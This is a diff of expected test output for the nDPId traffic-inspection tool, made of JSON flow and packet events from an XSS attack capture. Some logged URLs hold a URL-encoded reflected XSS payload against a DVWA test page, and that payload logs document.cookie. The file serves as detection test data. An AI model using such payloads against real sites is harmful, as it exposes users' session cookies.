+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} @@ -3716,7 +3716,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -3731,7 +3731,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} @@ -3856,7 +3856,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -3929,7 +3929,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -3966,7 +3966,7 @@ 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP 